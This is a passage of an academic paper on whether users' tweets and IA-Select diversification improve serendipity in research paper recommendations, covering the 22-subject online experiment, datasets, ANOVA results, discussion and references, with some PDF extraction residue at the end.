Cosine similarity: As a baseline, we employ a cosine similarity, which has been widely used in content-based recommender systems. The top-k items with largest cosine similarities are recommended. � IA-Select: Following this, we employ IA-Select (Agrawal et al., 2009) to deliver serendipitous recommendations. IA-Select was originally introduced for information retrieval, but it is also used in recommender systems to improve serendipity (Vargas, Castells & Vallet, 2012). This use case stems from the algorithm’s ability to diversify recommendations in a list, which relies on the avoidance of recommending similar items (e.g. research papers) together. The basic idea of IA-Select is that, for those features of a user profile that have been covered by papers already selected for recommendation, the weights are lowered in an iterative manner. At the outset, the algorithm computes cosine similarities between a user and each candidate item. In turn, IA-Select adds the item with the largest cosine similarity to the recommendation list. After selecting the item, IA-Select decreases the weights of features covered by the selected item in the user profile. These steps are repeated until k recommendations are determined. For example, recommendations for the user profile Pu = ((f1, 0.1), (f2, 0.9)) will contain mostly those documents that include feature f2. However, with IA-Select, the f2 score is decremented iteratively in the event that documents contain the f2 feature. Thus, the probability increases that documents covering the f1 feature are included in the list of recommended items. Overall, the three factors with the design choices described above result in 2 × 3 × 2 = 12 available strategies. The evaluation procedure used to compare the strategies is provided below. EVALUATION To address the two research questions with the three experimental factors described in the previous section, we conduct an online experiment with 22 subjects. The experiment is based in the field of computer science, in which an open access culture to research papers exists, and Twitter is chosen as the focal point because it is an established means by which researchers disseminate their works. The experimental design adopted in this study is consistent with previous studies (Nishioka & Scherp, 2016; Chen et al., 2010). Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 8/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ In this section, the experimental design is described, after which an account of the utilised datasets (i.e. a corpus of research papers and a knowledge graph of text mining methods) is given. Following this, descriptive statistics are presented for the research subjects, and finally, the serendipity score is stated. The purpose of the serendipity score is to evaluate the degree to which each recommender strategy is effective in generating serendipitous recommendations. Procedure We implemented a web application that enabled the subjects (n = 22) to evaluate the 12 recommendation strategies described above. First, subjects started on the welcome page, which asked for their consent to collect their data. Thereafter, the subjects were asked to input their Twitter handle and their name, as recorded in DBLP Persons (https://dblp.uni-trier.de/pers/). Based on the user’s name, we retrieved a list of their research papers and obtained the content of the papers by mapping them to the ACM-Citation- Network V8 dataset (see below). The top 5 recommendations were computed for each strategy, as shown in Fig. 1. Thus, each subject evaluated 5 × 12 = 60 items as “interesting” or “not interesting” based on the perceived relevance to their research interests. A binary evaluation was chosen to minimise the effort of the rating process, consistent with several previous studies (Nishioka & Scherp, 2016; Chen et al., 2010). As shown in Fig. 1, the recommended items were displayed with bibliographic information such as the authors, title, year, and venue. Finally, the subjects were provided with the opportunity to access and read the research paper directly by clicking on a link. In order to avoid bias, the sequence in which the 12 strategies appeared was randomised for each subject. This corresponds to earlier experimental setups such as a research paper recommender system in the domain of economics (Nishioka & Scherp, 2016) and other studies (Chen et al., 2010). At the same time, the list of the top 5 items for each strategy was also randomised to avoid the well-documented phenomenon of ranking bias (Bostandjiev, O’Donovan & Höllerer, 2012; Figure 1 Screenshot of the evaluation page. Each subject rated an item as either “interesting” or “not interesting” based on their research interests. Full-size DOI: 10.7717/peerj-cs.273/fig-1 Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 9/20 https://dblp.uni-trier.de/pers/ http://dx.doi.org/10.7717/peerj-cs.273/fig-1 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Chen et al., 2010). The subjects were informed about the randomised order of the strategies and items on the evaluation page. The actual ranks of the recommended items, as well as their position on the evaluation page, were stored in a database for later analyses. After evaluating all strategies, the subjects were asked to complete a questionnaire focusing on demographic information (e.g. age, profession, highest academic degree, and current employment status). Finally, an opportunity was provided for the subjects to provide qualitative feedback. Datasets The candidate items for the experiment were computer science articles drawn from a large dataset of research papers. To analyse and extract semantic concepts from the research papers and Tweets, an external computer science knowledge base was used. This section describes the research papers and knowledge graphs used for the experiment. Research papers Since the experiment recommended research papers from the field of computer science, a corpus of research papers and a knowledge base from the same field were used. The ACM citation network V8 dataset (https://lfs.aminer.org/lab-datasets/citation/ citation-acm-v8.txt.tgz), provided by ArnetMiner (Tang et al., 2008), was used as the corpus of research papers. From the dataset, 1,669,237 of the available 2,381,688 research papers were included that had a title, author, year of publication, venue, and abstract. Titles and abstracts were used to generate paper profiles. Knowledge graph The ACM Computing Classification System (CCS) was used as the knowledge graph for CF-IDF and HCF-IDF (https://www.acm.org/publications/class-2012). The knowledge graph, which is freely available, is characterised by its focus on computer science, as well as its hierarchical structure. It consists of 2,299 concepts and 9,054 labels, which are organised on six levels. On average, a concept is represented by 3.94 labels (SD: 3.49). For the text mining methods (i.e. CF-IDF and HCF-IDF), we extracted concepts from each user’s Tweets and research papers by matching the text with the labels of the concepts in the knowledge graph. As such, we applied what is known in the literature as the gazetteer-based approach. Before processing, we lemmatised both the Tweets and research papers using Stanford Core NLP (https://stanfordnlp.github.io/CoreNLP/), and stop words were removed. Regarding Tweets, which often contain hashtags to indicate topics and user mentions, only the # and @ symbols were removed from the Tweets. This decision stemmed from an observation made by Feng & Wang (2014), namely that the combination of Tweets’ texts with hashtags and user mentions results in the optimal recommendation performance. Subjects Overall, 22 subjects were recruited through Twitter and mailing lists. 20 were male and two were female, and the average age was 36.45 years old (SD: 5.55). Several of the subjects held master’s degrees (n = 2), while the others held a PhD (n = 13) or were lecturers or Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 10/20 https://lfs.aminer.org/lab-datasets/citation/citation-acm-v8.txt.tgz https://lfs.aminer.org/lab-datasets/citation/citation-acm-v8.txt.tgz https://www.acm.org/publications/class-2012 https://stanfordnlp.github.io/CoreNLP/ http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ professors (n = 7). In terms of the subjects’ employment status, 19 were working in academia and three in industry. Table 2 shows countries where subjects work. On average, the subjects published 1,256.97 Tweets (SD: 1,155.8), with the minimum value being 26 and the maximum value being 3,158. An average of 4,968.03 terms (SD: 4,641.76) was extracted from the Tweets, along with an average of 297.91 concepts (SD: 271.88). Thus, on average, 3.95 (SD: 0.54) terms and 0.24 concepts (SD: 0.10) were included per Tweet. We show a histogram regarding the number of terms in Tweets per subject in Fig. 2. We observe that subjects are divided into those with a small total number of terms in their Tweets and those with a large total number of terms in their Tweets. Regarding the use of research papers for user profiling, the subjects had published an average of 11.41 papers (SD: 13.53). On average, 687.68 terms (SD: 842,52) and 80.23 concepts (SD: 107.73) were identified in their research papers. This led to 60.27 terms (SD: 18.95) and 5.77 concepts (SD: 3.59) per paper. Figure 3 shows a histogram regarding the number of terms in research papers per subject. We see Table 2 The number of subjects in each country. Country The number of subjects Germany 8 US 4 China 2 UK 2 Austria 1 Brazil 1 France 1 Ireland 1 Norway 1 Sweden 1 Figure 2 Distribution of subjects with regarding to the number of terms in their Tweets. The x-axis shows the number of terms in their Tweets. The y-axis shows the number of subjects. For instance, there are five subjects whose total number of terms in Tweets is between 10,001 and 20,000. Full-size DOI: 10.7717/peerj-cs.273/fig-2 Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 11/20 http://dx.doi.org/10.7717/peerj-cs.273/fig-2 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ that there are a few subjects with a large total number of terms. Most subjects have a small total number of terms in their research papers because they published only a few research papers so far. Subjects needed 39 s (SD: 43 s) on average to evaluate all five recommended items per strategy. Thus, the average length of time needed to complete the experiment was 468 s. It is worth noting that this time does not include reading the instructions on the welcome page, inputting the Twitter handle and DBLP record, and completing the questionnaire. Evaluation metric To evaluate the serendipity of recommendations, we used the serendipity score (SRDP) (Ge, Delgado-Battenfeld & Jannach, 2010). This evaluation metric takes into account both the unexpectedness and usefulness of recommended items, which is defined as: SRDP ¼ X d2UE rateðdÞ jUEj (5) UE denotes a set of unexpected items that are recommended to a user. An item is regarded as unexpected if it is not included in a recommendation list computed by the primitive strategy. We used the strategy Own Papers × TF-IDF × Cosine Similarity as a primitive strategy since it is a combination of baselines. The function rate(d) returns an evaluation rate of an item d given by a subject. As such, if a subject evaluated an item as “interesting”, the function would return 1, otherwise 0. We did not directly ask subjects to evaluate the unexpectedness of recommendations, because this is not the scenario in which the recommender system is used. Rather, we were aiming to detect indirectly from the subjects’ responses, if the serendipity feature had an influence on the dependent variables. Furthermore, we wanted to keep the online evaluation as simple as possible. Asking for “how surprising” a recommendation is, increases the complexity of the experiment. Subjects needed to know what a non-surprising recommendation is (in comparison). In addition, the cognitive efforts Figure 3 Distribution of subjects with regarding to the number of terms in their research papers. The x-axis shows the number of terms in their research papers. The y-axis shows the number of sub- jects. For instance, there are two subjects whose total number of terms in research papers is between 2,001 and 4,000. Full-size DOI: 10.7717/peerj-cs.273/fig-3 Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 12/20 http://dx.doi.org/10.7717/peerj-cs.273/fig-3 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ required to conduct a direct evaluation of unexpectedness is much higher and it is in general difficult for subjects to share the concept of the unexpectedness. RESULTS The purpose of this section is to present the results of the experiment. At the outset, the quantitative analysis is examined, which shows the optimal strategy in terms of SRDP. In turn, the impact of each of the three experimental factors is analysed. Comparison of the 12 strategies The results of the 12 strategies in terms of their SRDP values are presented in Table 3. As previously noted, this study drew on Own Papers × TF-IDF × Cosine Similarity as a primitive strategy. Thus, for this particular strategy, the mean and standard deviation are 0.00. The purpose of an analysis of variance (ANOVA) is to detect significant differences between variables. Therefore, in this study, ANOVA was used to identify whether any of the strategies were significantly different. The significance level was set to α = 0.05. Mauchly’s test revealed a violation of sphericity (χ2(54) = 80.912, p = 0.01), which could lead to positively biased F-statistics and, consequently, an increase in the risk of false positives. Therefore, a Greenhouse-Geisser correction with ε = 0.58 was applied. The results of the ANOVA test revealed that significant differences existed between the strategies (F(5.85, 122.75) = 3.51, p = 0.00). Therefore, Shaffer’s modified sequentially rejective Bonferroni procedure was undertaken to compute the pairwise differences between the strategies (Shaffer, 1986). We observed significant differences between the primitive strategy and one of the other strategies. Table 3 SRDP and the number of unexpected items included in the 12 strategies. The values are ordered by SRDP. M and SD denote mean and standard deviation, respectively. Strategy SRDP |UE| Text mining method Profiling source Ranking method M (SD) M (SD) 1. TF-IDF Own papers IA-Select 0.45 (0.38) 2.95 (1.05) 2. CF-IDF Twitter CosSim 0.39 (0.31) 4.91 (0.29) 3. TF-IDF Twitter IA-Select 0.36 (0.29) 4.91 (0.43) 4. CF-IDF Twitter IA-Select 0.31 (0.22) 4.95 (0.21) 5. CF-IDF Own papers CosSim 0.26 (0.28) 4.91 (0.29) 6. CF-IDF Own papers IA-Select 0.25 (0.28) 4.91 (0.29) 7. HCF-IDF Own papers IA-Select 0.24 (0.22) 4.95 (0.21) 8. HCF-IDF Twitter CosSim 0.22 (0.28) 5.00 (0.00) 9. TF-IDF Twitter CosSim 0.20 (0.24) 4.95 (0.21) 10. HCF-IDF Twitter IA-Select 0.18 (0.21) 5.00 (0.00) 11. HCF-IDF Own papers CosSim 0.16 (0.18) 5.00 (0.00) 12. TF-IDF Own papers CosSim 0.00 (0.00) 0.00 (0.00) Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 13/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Impact of experimental factors In order to analyse the impact of each experimental factor, a three-way repeated measures ANOVA was conducted. The Mendoza test identified violations of sphericity for the following factors: firstly, User Profile Source × Text Mining Method × Ranking Method (χ2(65) = 101.83, p = 0.0039); and secondly, Text Mining Method × Ranking Method (χ2(2) = 12.01, p = 0.0025) (Mendoza, 1980). Thus, a three-way repeated measures ANOVA was applied with a Greenhouse-Geiser correction of ε = 0.54 for the factors User Profile Source × Text Mining Method × Ranking Method and ε = 0.69 for the factor Text Mining Method × Ranking Method. Table 4 shows the results with the F-Ratio, effect size η2, and p-value. Regarding the single factors, Ranking Method had the largest impact on SRDP, as the effect size η2 indicates. For all the factors with significant differences, we applied a post-hoc analysis using Shaffer’s MSRB procedure. The results of the post-hoc analysis revealed that the strategies using IA-Select resulted in higher SRDP values when compared to those using cosine similarity. In addition, we observed a significant difference in the factors User Profile Source × Ranking Method and Text Mining Method × Ranking Method. For both factors, post-hoc analyses revealed significant differences when a baseline was used in either of the two factors. When a baseline was used in one factor, |UE| became small unless a method other than a baseline was used in the other factor. DISCUSSION This section discusses the study’s results in relation to the two research questions. In turn, we review the results for the Text Mining Method factor, which was found to have the largest influence on recommendation performance among the three factors. RQ1: Do a user’s Tweets generate serendipitous recommendations? Regarding RQ1, the results of the experiment indicate that a user’s Tweets do not improve the serendipity of recommendations. As shown in the rightmost column of Table 3, Tweets deliver unexpected recommendations to users, but only a small fraction of these are interesting to the users. This result is different from previous works. For instance, Chen et al. (2010) observed the precision of a webpage recommender system based on Table 4 Three-way repeated measures ANOVA for SRDP with Greenhouse-Geisser correction and F-ratio, effect size η2, and p-value. The p-values are marked in bold font if p < .05, which indicates a significant difference in a factor. Factor F η2 p User profile source 2.21 0.11 0.15 Text mining method 3.02 0.14 0.06 Ranking method 14.06 0.67 0.00 User profile source × Text mining method 0.98 0.05 0.38 User profile source × Ranking method 18.20 0.87 0.00 Text mining method × Ranking method 17.80 0.85 0.00 User profile source × Text mining M. × Ranking M. 2.39 0.11 0.11 Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 14/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ user’s Tweets was around 0.7. In addition, Lu, Lam & Zhang (2012) showed that a concept- based tweet recommender system based on user’s Tweets achieves a precision of 0.5. One way to account for this result is by drawing attention to the high probability that the users employed their Twitter accounts for purposes other than professional, research-related ones. In particular, the users are likely to have used their Twitter accounts to express private interests. We presume that taking private interests into consideration delivers serendipitous recommendations. This is because the recommender system will then suggest research papers that include both professional interests and private interests, and which are thus likely to be serendipitous. In the future, it may be helpful to introduce explanation interfaces for recommender systems (Herlocker, Konstan & Riedl, 2000; Tintarev & Masthoff, 2007). The purpose of these explanation interfaces is to show why a specific item is being recommended to users, thereby enabling users to find a connexion between a recommended paper and their interests. RQ2: Is it possible to improve a recommendation list’s serendipity through diversification? In terms of RQ2, the results indicate that the diversification of a recommendation list using the IA-Select algorithm delivers serendipitous recommendations. This confirms results published elsewhere in the literature, which have found that IA-Select improves serendipity (Vargas, Castells & Vallet, 2011; Vargas & Castells, 2011). For instance, in the domain of movies and music, Vargas & Castells (2011) employed IA-Select for recommender systems and confirmed that it provides unexpected recommendations. Additionally, the iterative decrease of covered interests was associated with greater variety in recommender systems for scientific publications. Furthermore, the experiment demonstrated that diversified recommendations are likely to be associated with greater utility for users. Text mining methods Among the three factors, the Text Mining Method factor was associated with the most substantial impact on recommender system performance. In contrast to observations made in previous literature (Goossen et al., 2011; Nishioka & Scherp, 2016), CF-IDF and HCF-IDF did not yield effective results. It is worth emphasising that this result could have been influenced by the quality of the knowledge graph used in this study (i.e. ACM CCS), particularly in view of the fact that the performance of many text mining methods is directly informed by the quality of the knowledge graph (Nishioka, Große-Bölting & Scherp, 2015). Another way to account for the poor outcomes relates to the variable of the knowledge graphs’ age. In particular, ACM CCS has not been updated since 2012, despite the fact that computer science is a rapidly changing field of inquiry. Furthermore, relatively few concepts and labels were included in the knowledge base, which contrasts with the large number included in the knowledge graphs used in previous studies. For example, the STW Thesaurus for Economics used 6,335 concepts and 37,773 labels, respectively (Nishioka & Scherp, 2016). Hence, the number of concepts and labels could have Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 15/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ influenced the quality of the knowledge graph and, in turn, the recommender system’s performance. In addition, while a previous study that used HCF-IDF (Nishioka & Scherp, 2016) only drew on the titles of research papers, our study used both titles and abstracts to construct paper profiles and user profiles when a user’s own papers were selected as the user profile source. Furthermore, since our study used sufficient information when mining research papers, we did not observe any differences among TF-IDF, CF-IDF, and HCF-IDF, which can include related concepts. Finally, as with any empirical experiment, data triangulation is needed before generalising any of the conclusions drawn in this paper. Therefore, further studies of recommender systems in other domains and similar settings should be conducted. In this article, we used only textual information in Tweets. We did not use contents from URLs mentioned in Tweets, images, and videos. We observed that Tweets by subjects contain on average 0.52 URLs (SD: 0.59). In the future, we would like to take these contents into account, as Abel et al. (2011) did. Threats to validity In this article, we only considered the domain of computer science. In other domains, the results and findings might be different. In the future, we would like to conduct studies in other domains such as biomedical science using MEDLINE and social science, economics. In addition, the results shown in this article may potentially be influenced by the number of subjects we recruited. Finding significances with few subjects is harder than with many subjects. However, we observed several significances and measured the effect sizes. We assume that adding more subjects would bring almost no additional insights. As noted in the related work, this study evaluates serendipity of recommendations focusing on “unexpectedness to be found” and “unexpectedness to be recommended”. This is motivated by our library setting, where we assume researchers are working on research papers and like to receive recommendations for literature that they have not found yet (Vagliano et al., 2018). Referring to the other variations of serendipity as proposed by Kotkov et al. (2018), like “unexpectedness to be relevant” and “implicit unexpectedness”, we leave them for future studies. CONCLUSION The purpose of this study’s online experiment was to determine whether Tweets and the IA-Select algorithm have the capability to deliver serendipitous research paper recommendations. The results revealed that Tweets do not improve the serendipity of recommendations, but IA-Select does. We anticipate that this insight will contribute to the development of future recommender systems, principally because service providers and platform administrators can use the data presented here to make more informed design choices for the systems and services developed. The data from this experiment are publicly available for further study and reuse (https://doi.org/10.5281/zenodo.3367795). Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 16/20 https://doi.org/10.5281/zenodo.3367795 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the EU H2020 project MOVING (No. 693092), the JSPS Grant-in-Aidfor Scientific Research (S) (No. 16H06304), and the JSPS Grant-in-Aid for Young Scientists (No. 18K13235). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: EU H2020 project MOVING: 693092. JSPS Grant-in-Aid for Scientific Research (S): 16H06304. JSPS Grant-in-Aid for Young Scientists: 18K13235. Competing Interests The authors declare that they have no competing interests. Author Contributions � Chifumi Nishioka conceived and designed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Jörn Hauke conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. � Ansgar Scherp conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The data is available at Zenodo: Nishioka, Chifumi, Scherp, Ansgar, & Hauke, Jörn. (2019). Experimental result to investigate the influence of user's tweets and diversification on serendipitous research paper recommendations [Data set]. Zenodo. DOI 10.5281/zenodo.3367796. REFERENCES Abel F, Gao Q, Houben G-J, Tao K. 2011. Semantic enrichment of twitter posts for user profile construction on the social web. In: Extended Semantic Web Conference. Springer, 375–389. Abel F, Herder E, Krause D. 2011. Extraction of professional interests from social web profiles. In: International Conference on User Modeling, Adaptation and Personalization (UMAP). Achakulvisut T, Acuna DE, Ruangrong T, Kording K. 2016. Science concierge: a fast content-based recommendation system for scientific publications. PLOS ONE 11(7):e0158423 DOI 10.1371/journal.pone.0158423. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 17/20 http://dx.doi.org/10.5281/zenodo.3367796 http://dx.doi.org/10.1371/journal.pone.0158423 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Agrawal R, Gollapudi S, Halverson A, Ieong S. 2009. Diversifying search results. In: Proceedings of the Second ACM International Conference on Web Search and Data Mining. New York: ACM, 5–14. Bai X, Wang M, Lee I, Yang Z, Kong X, Xia F. 2019. Scientific paper recommendation: a survey. IEEE Access 7:9324–9339 DOI 10.1109/ACCESS.2018.2890388. Beel J, Gipp B, Langer S, Breitinger C. 2016. Research-paper recommender systems: a literature survey. International Journal on Digital Libraries 17(4):305–338 DOI 10.1007/s00799-015-0156-0. Bostandjiev S, O’Donovan J, Höllerer T. 2012. Taste-weights: a visual interactive hybrid recommender system. In: Proceedings of the Sixth ACM Conference on Recommender Systems. New York: ACM. Carbonell JG, Goldstein J. 1998. The use of MMR, diversity-based reranking for reordering documents and producing summaries. In: Proceedings of the 21st Annual International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 335–336 DOI 10.1145/290941.291025. Chen J, Nairn R, Nelson L, Bernstein M, Chi E. 2010. Short and tweet: experiments on recommending content from information streams. In: Proceedings of the SIGCHI Conference on Human Factors in Computing Systems. New York: ACM. Collins AM, Loftus EF. 1975. A spreading-activation theory of semantic processing. Psychological Review 82(6):407–428 DOI 10.1037/0033-295X.82.6.407. Feng W, Wang J. 2014. We can learn your# hashtags: connecting tweets to explicit topics. In: 2014 IEEE 30th International Conference on Data Engineering. IEEE, 856–867. Ge M, Delgado-Battenfeld C, Jannach D. 2010. Beyond accuracy: evaluating recommender systems by coverage and serendipity. In: Proceedings of the Fourth ACM Conference on Recommender Systems. New York: ACM, 257–260. Goossen F, IJntema W, Frasincar F, Hogenboom F, Kaymak U. 2011. News personalization using the CF-IDF semantic recommender. In: Proceedings of the International Conference on Web Intelligence, Mining and Semantics. New York: ACM. Herlocker JL, Konstan JA, Riedl J. 2000. Explaining collaborative filtering recommendations. In: Proceedings of the 2000 ACM Conference on Computer Supported Cooperative Work. New York: ACM, 241–250. Herlocker JL, Konstan JA, Terveen LG, Riedl J. 2004. Evaluating collaborative filtering recommender systems. ACM Transactions on Information Systems (TOIS) 22(1):5–53 DOI 10.1145/963770.963772. Kapanipathi P, Jain P, Venkataramani C, Sheth A. 2014. User interests identification on Twitter using a hierarchical knowledge base. In: European Semantic Web Conference. Berlin: Springer. Kaya B. 2018. User profile based paper recommendation system. International Journal of Intelligent Systems and Applications in Engineering 6(2):151–157 DOI 10.18201/ijisae.2018642079. Kotkov D, Konstan JA, Zhao Q, Veijalainen J. 2018. Investigating serendipity in recommender systems based on real user feedback. In: Proceedings of the 33rd Annual ACM Symposium on Applied Computing. 1341–1350. Kotkov D, Veijalainen J, Wang S. 2018. How does serendipity affect diversity in recommender systems? A serendipity-oriented greedy algorithm. Computing 102(2):1–19 DOI 10.1007/s00607-018-0687-5. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 18/20 http://dx.doi.org/10.1109/ACCESS.2018.2890388 http://dx.doi.org/10.1007/s00799-015-0156-0 http://dx.doi.org/10.1145/290941.291025 http://dx.doi.org/10.1037/0033-295X.82.6.407 http://dx.doi.org/10.1145/963770.963772 http://dx.doi.org/10.18201/ijisae.2018642079 http://dx.doi.org/10.1007/s00607-018-0687-5 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Kotkov D, Wang S, Veijalainen J. 2016. A survey of serendipity in recommender systems. Knowledge-Based Systems 111:180–192 DOI 10.1016/j.knosys.2016.08.014. Letierce J, Passant A, Breslin JG, Decker S. 2010. Understanding how Twitter is used to spread scientific messages. In: The Web Science Conference 2010, At Raleigh, NC, USA. Lops P, De Gemmis M, Semeraro G. 2011. Content-based recommender systems: state of the art and trends. In: Ricci F, Rokach L, Shapira B, Kantor P, eds. Recommender Systems Handbook. Boston: Springer, 73–105. Lu C, Lam W, Zhang Y. 2012. Twitter user modeling and tweets recommendation based on Wikipedia concept graph. In: Workshops at the Twenty-Sixth AAAI Conference on Artificial Intelligence. McNee SM, Riedl J, Konstan JA. 2006. Being accurate is not enough: how accuracy metrics have hurt recommender systems. In: CHI’06 Extended Abstracts on Human Factors in Computing Systems. New York: ACM, 1097–1101. Mendoza JL. 1980. A significance test for multisample sphericity. Psychometrika 45(4):495–498. Middleton SE, Shadbolt NR, De Roure DC. 2004. Ontological user profiling in recommender systems. ACM Transactions on Information Systems (TOIS) 22(1):54–88 DOI 10.1145/963770.963773. Nascimento C, Laender AHF, Da Silva AS, Gonçalves MA. 2011. A source independent framework for research paper recommendation. In: Proceedings of the 11th Annual International ACM/IEEE Joint Conference on Digital Libraries. New York: ACM, 297–306. Nishioka C, Große-Bölting G, Scherp A. 2015. Influence of time on user profiling and recommending researchers in social media. In: Proceedings of the 15th International Conference on Knowledge Technologies and Data-driven Business. New York: ACM DOI 10.1145/2809563.2809601. Nishioka C, Scherp A. 2016. Profiling vs. time vs. content: what does matter for top-k publication recommendation based on Twitter profiles? In: Proceedings of 2016 IEEE/ACM Joint Conference on Digital Libraries. New York: ACM, 171–180. Orlandi F, Breslin J, Passant A. 2012. Aggregated, interoperable and multi-domain user profiles for the social web. In: Proceedings of the 8th International Conference on Semantic Systems. New York: ACM, 41–48 DOI 10.1145/2362499.2362506. Salton G, Buckley C. 1988. Term-weighting approaches in automatic text retrieval. Information Processing & Management 24(5):513–523. Shaffer JP. 1986. Modified sequentially rejective multiple test procedures. Journal of the American Statistical Association 81(395):826–831. Shani G, Gunawardana A. 2011. Evaluating recommendation systems. In: Ricci F, Rokach L, Shapira B, Kantor P, eds. Recommender Systems Handbook. Boston: Springer, 257–297. Shen W, Wang J, Luo P, Wang M. 2013. Linking named entities in Tweets with knowledge base via user interest modeling. In: Proceedings of the 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 68–76 DOI 10.1145/2487575.2487686. Sugiyama K, Kan M-Y. 2010. Scholarly paper recommendation via user’s recent research interests. In: Proceedings of the 10th Annual Joint Conference on Digital Libraries. New York: ACM, 29–38 DOI 10.1145/1816123.1816129. Sugiyama K, Kan M-Y. 2015. Towards higher relevance and serendipity in scholarly paper recommendation. ACM SIGWEB Newsletter 4(Winter):16. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 19/20 http://dx.doi.org/10.1016/j.knosys.2016.08.014 http://dx.doi.org/10.1145/963770.963773 http://dx.doi.org/10.1145/2809563.2809601 http://dx.doi.org/10.1145/2362499.2362506 http://dx.doi.org/10.1145/2487575.2487686 http://dx.doi.org/10.1145/1816123.1816129 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Tang J, Zhang J, Yao L, Li J, Zhang L, Su Z. 2008. ArnetMiner: extraction and mining of academic social networks. In: Proceedings of the 14th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. New York: ACM, 990–998. Tintarev N, Masthoff J. 2007. Effective explanations of recommendations: user-centered design. In: Proceedings of the 2007 ACM Conference on Recommender Systems. New York: ACM, 153–156. Uchiyama K, Nanba H, Aizawa A, Sagara T. 2011. Osusume: cross-lingual recommender system for research papers. In: Proceedings of the 2011 Workshop on Context-awareness in Retrieval and Recommendation. New York: ACM, 39–42. Vagliano I, Gunther F, Heinz M, Apaolaza A, Bienia I, Breitfuss G, Blume T, Collyda C, Fessl A, Gottfried S, Hasitschka P, Kellermann J, Kohler T, Maas A, Mezaris V, Saleh A, Skulimowski AMJ, Thalmann S, Vigo M, Wertner A, Wiese M, Scherp A. 2018. Open innovation in the big data era with the moving platform. IEEE MultiMedia 25(3):8–21 DOI 10.1109/MMUL.2018.2873495. Vargas S, Castells P. 2011. Rank and relevance in novelty and diversity metrics for recommender systems. In: Proceedings of the Fifth ACM Conference on Recommender Systems. New York: ACM, 109–116. Vargas S, Castells P, Vallet D. 2011. Intent-oriented diversity in recommender systems. In: Proceedings of the 34th International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 1211–1212. Vargas S, Castells P, Vallet D. 2012. Explicit relevance models in intent-oriented information retrieval diversification. In: Proceedings of the 35th International ACM SIGIR Conference on Research and Development in Information Retrieval. New York: ACM, 75–84. Wu Y, Liu Y, Chen F, Zhang M, Ma S. 2018. Beyond greedy search: pruned exhaustive search for diversified result ranking. In: Proceedings of the 2018 ACM SIGIR International Conference on Theory of Information Retrieval. New York: ACM, 99–106. Ziegler C-N, McNee SM, Konstan JA, Lausen G. 2005. Improving recommendation lists through topic diversification. In: Proceedings of the 14th International Conference on World Wide Web. New York: ACM, 22–32. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 20/20 http://dx.doi.org/10.1109/MMUL.2018.2873495 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Influence of tweets and diversification on serendipitous research paper recommender systems Introduction Related work Experimental factors Evaluation Results Discussion Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false 